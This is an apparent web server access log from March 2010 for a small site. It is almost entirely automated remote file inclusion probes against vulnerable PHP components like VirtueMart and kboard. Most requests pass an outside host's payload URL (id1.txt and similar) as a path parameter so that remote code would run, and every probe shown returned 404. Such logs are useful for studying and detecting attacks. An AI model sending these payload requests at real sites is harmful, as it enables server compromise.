118.168.12.152 - - [09/Mar/2010:08:36:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:36:14 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:36:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:37:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [09/Mar/2010:08:38:25 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:38:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:38:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:38:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:39:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:39:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:39:01 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.141.1.113 - - [09/Mar/2010:08:40:07 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:08:41:13 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:42:23 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:42:25 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:42:25 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.141.1.113 - - [09/Mar/2010:08:42:29 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:43:26 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:43:26 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:43:28 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:43:28 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:08:43:32 -0800] "GET /logs/access.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.195.115.250 - - [09/Mar/2010:08:47:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.115.250 - - [09/Mar/2010:08:47:08 -0800] "GET /logs/access_091108.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
201.93.165.28 - - [09/Mar/2010:08:49:14 -0800] "GET /delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.93.165.28 - - [09/Mar/2010:08:49:14 -0800] "GET /logs/access.log%20%20//delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.93.165.28 - - [09/Mar/2010:08:49:14 -0800] "GET /logs//delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:08:55:10 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
92.48.119.75 - - [09/Mar/2010:08:56:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
92.48.119.75 - - [09/Mar/2010:08:56:55 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
92.48.119.75 - - [09/Mar/2010:08:56:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.243.44 - - [09/Mar/2010:09:01:25 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
218.38.243.44 - - [09/Mar/2010:09:01:25 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
218.38.243.44 - - [09/Mar/2010:09:01:25 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
118.168.12.152 - - [09/Mar/2010:09:03:05 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:09:03:05 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.168.12.152 - - [09/Mar/2010:09:03:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:04:28 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:04:28 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:04:28 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:04:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:04:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:04:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:05:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:05:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:05:56 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
92.48.119.75 - - [09/Mar/2010:09:06:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
92.48.119.75 - - [09/Mar/2010:09:06:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
92.48.119.75 - - [09/Mar/2010:09:06:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:06:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:06:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.251.189.206 - - [09/Mar/2010:09:06:15 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:06:56 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:06:56 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:06:56 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:06:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:06:58 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:06:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:07:14 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:07:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:07:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:09:12 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:09:12 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:09:12 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:09:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:09:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:09:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:10:07 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:10:07 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
78.110.50.120 - - [09/Mar/2010:09:10:07 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:12:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:12:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:12:17 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:14:41 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:14:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [09/Mar/2010:09:14:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:14:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:14:59 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.125.21.66 - - [09/Mar/2010:09:14:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:28 -0800] "GET //include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:28 -0800] "GET /logs/access.log///include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:28 -0800] "GET /logs///include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:47 -0800] "GET //include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:47 -0800] "GET /logs/access.log///include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.114.112.155 - - [09/Mar/2010:09:16:47 -0800] "GET /logs///include/prodler.class.php?sPath=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.16 - - [09/Mar/2010:09:16:52 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.16 - - [09/Mar/2010:09:16:52 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.16 - - [09/Mar/2010:09:16:52 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [09/Mar/2010:09:17:54 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:09:18:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [09/Mar/2010:09:18:08 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [09/Mar/2010:09:18:08 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
210.116.103.118 - - [09/Mar/2010:09:18:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
210.116.103.118 - - [09/Mar/2010:09:18:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
210.116.103.118 - - [09/Mar/2010:09:18:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [09/Mar/2010:09:19:38 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:09:19:38 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [09/Mar/2010:09:19:39 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:19:49 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:19:49 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:19:49 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:20:13 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:20:13 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
72.249.104.35 - - [09/Mar/2010:09:20:13 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:09:20:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [09/Mar/2010:09:20:25 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://